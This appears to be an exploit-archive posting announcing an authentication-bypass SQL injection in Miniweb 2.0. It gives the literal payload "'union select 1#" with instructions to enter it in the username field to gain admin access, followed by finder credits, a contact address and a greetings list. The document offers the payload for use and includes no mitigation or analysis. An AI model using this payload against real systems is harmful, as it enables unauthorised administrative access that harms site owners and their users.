Miniweb version 2.0 suffers from a SQL injection vulnerability that allows for authentication bypass.
4f82f8ebcf1e64f3e0b17fd62fa0b5e9##############################################################################
# Miniweb 2.0 Admin bypass
##############################################################################
# Type:
# 'union select 1#
# in the username field and press login, you are admin!
#
# download: http://www.miniweb2.com/
##############################################################################
# Found by bizzit and cybernetic
#
# Contact: bizzit[at]live.de
##############################################################################
# Greetz to:
# Suicide, ReED, h0yt3r, J0hn^x3r, tmh, n00bor, Five-Three-Nine, electron1x,
# Nazrek, Free-Hack and Sys-Flaw
##############################################################################
Comments
No comments yet, be the first!